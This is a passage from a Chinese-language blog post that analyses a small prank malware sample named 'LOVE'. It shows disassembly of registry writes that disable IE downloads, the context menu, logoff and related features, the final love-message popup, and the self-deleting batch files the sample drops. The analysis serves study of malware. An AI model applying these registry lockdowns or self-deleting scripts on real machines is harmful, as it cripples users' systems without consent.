push 0x80000004 00401C3D |. 6A 00 push 0x0 00401C3F |. 68 46A14600 push LOVE.0046A146 ; Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803 00401C44 |. 68 01030080 push 0x80000301 00401C49 |. 6A 00 push 0x0 00401C4B |. 68 03000000 push 0x3 00401C50 |. 68 03000000 push 0x3 00401C55 |. BB 103B4000 mov ebx,LOVE.00403B10 00401C5A |. E8 F4160000 call LOVE.00403353 ; 禁用IE下载功能 00401C62 |. 68 01030080 push 0x80000301 00401C67 |. 6A 00 push 0x0 00401C69 |. 68 01000000 push 0x1 00401C6E |. 68 04000080 push 0x80000004 00401C73 |. 6A 00 push 0x0 00401C75 |. 68 8FA14600 push LOVE.0046A18F ; Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu 00401C7A |. 68 01030080 push 0x80000301 00401C7F |. 6A 00 push 0x0 00401C81 |. 68 03000000 push 0x3 00401C86 |. 68 03000000 push 0x3 00401C8B |. BB 103B4000 mov ebx,LOVE.00403B10 00401C90 |. E8 BE160000 call LOVE.00403353 ; 禁用右键关联 00401C98 |. 68 01030080 push 0x80000301 00401C9D |. 6A 00 push 0x0 00401C9F |. 68 01000000 push 0x1 00401CA4 |. 68 04000080 push 0x80000004 00401CA9 |. 6A 00 push 0x0 00401CAB |. 68 DFA14600 push LOVE.0046A1DF ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode 00401CB0 |. 68 01030080 push 0x80000301 00401CB5 |. 6A 00 push 0x0 00401CB7 |. 68 03000000 push 0x3 00401CBC |. 68 03000000 push 0x3 00401CC1 |. BB 103B4000 mov ebx,LOVE.00403B10 00401CC6 |. E8 88160000 call LOVE.00403353 ; 禁止重启切换到DOS环境下 00401CCE |. 68 01030080 push 0x80000301 00401CD3 |. 6A 00 push 0x0 00401CD5 |. 68 01000000 push 0x1 00401CDA |. 68 04000080 push 0x80000004 00401CDF |. 6A 00 push 0x0 00401CE1 |. 68 26A24600 push LOVE.0046A226 ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff 00401CE6 |. 68 01030080 push 0x80000301 00401CEB |. 6A 00 push 0x0 00401CED |. 68 03000000 push 0x3 00401CF2 |. 68 03000000 push 0x3 00401CF7 |. BB 103B4000 mov ebx,LOVE.00403B10 00401CFC |. E8 52160000 call LOVE.00403353 ; 禁止注销计算机 00401D04 |. 68 01030080 push 0x80000301 00401D09 |. 6A 00 push 0x0 00401D0B |. 68 01000000 push 0x1 00401D10 |. 68 04000080 push 0x80000004 00401D15 |. 6A 00 push 0x0 00401D17 |. 68 6BA24600 push LOVE.0046A26B ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu 00401D1C |. 68 01030080 push 0x80000301 00401D21 |. 6A 00 push 0x0 00401D23 |. 68 03000000 push 0x3 00401D28 |. 68 03000000 push 0x3 00401D2D |. BB 103B4000 mov ebx,LOVE.00403B10 00401D32 |. E8 1C160000 call LOVE.00403353 ; 禁用文档菜单
其中还有很多操作,但是都是一样的,这里就不一一列出来了,基本上都是很简单的一些注册表操作。运行到下面,基本上就结束了:
004032C9 /. 55 push ebp 004032CA |. 8BEC mov ebp,esp 004032CC |. 68 04000080 push 0x80000004 004032D1 |. 6A 00 push 0x0 004032D3 |. 68 9FC44600 push LOVE.0046C49F ; LOVE 004032D8 |. 68 01030080 push 0x80000301 004032DD |. 6A 00 push 0x0 004032DF |. 68 00000000 push 0x0 004032E4 |. 68 04000080 push 0x80000004 004032E9 |. 6A 00 push 0x0 004032EB |. 68 A4C44600 push LOVE.0046C4A4 ; 李研我爱你! 004032F0 |. 68 03000000 push 0x3 004032F5 |. BB E03B4000 mov ebx,LOVE.00403BE0 004032FA |. E8 54000000 call LOVE.00403353 ;到此处,基本完事,这儿就是弹出消息框:“李燕我爱你!” 004032FF |. 83C4 28 add esp,0x28 00403302 |. 8BE5 mov esp,ebp 00403304 |. 5D pop ebp
补充:
生成的del.bat文件和ddel.bat文件的内容:
del.bat:
del Aver.exe del.bat ---->删除Aver.exe和del.bat
del %
ddel.bat:
@echo off
taskkill /f /im expleror.exe ---->强制终止expleror.exe进程,也就是桌面进程。
start expleror.exe ---->重新启动。 这儿就是为了显示:所以应用程序图标变化。
del ddel.bat ---->删除自己。
exit
第一次分析,其中还有很多地方,很多细节没有分析到位,请各位大大多多指教。。。
浙公网安备 33010602011771号